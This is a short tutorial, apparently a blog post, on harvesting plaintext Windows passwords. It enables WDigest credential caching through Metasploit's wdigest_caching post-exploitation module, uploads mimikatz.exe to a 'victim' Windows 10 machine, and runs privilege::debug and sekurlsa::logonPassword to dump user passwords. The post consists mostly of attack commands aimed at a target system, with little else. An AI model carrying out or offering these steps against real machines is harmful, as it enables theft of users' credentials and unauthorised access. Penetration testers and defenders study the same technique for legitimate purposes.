On Windows 8/2012 or higher,
the Digest Security Provider (WDIGEST) is disabled by default. This module
enables/disables credential caching by adding/changing the value of the
UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequest
logins will allow mimikatz to recover the plain text passwords from the
system's memory.
Exploit Targets
Windows 10
Requirement
Attacker: kali Linux
Victim PC: Windows 10
Open
Kali terminal type msfconsole
Now
type use
post/windows/manage/wdigest_caching
msf exploit (wdigest_caching)>set session 1
msf exploit (wdigest_caching)>exploit
To send mimikatz file to the target system using following
command
Upload /usr/share/mimikatz/x64/mimikatz.exe
e:\\
Type the following command to check
privilege
privilege::debug
Then type the following command to get users passwords in
text mode.
sekurlsa::logonPassword
0 comments:
Post a Comment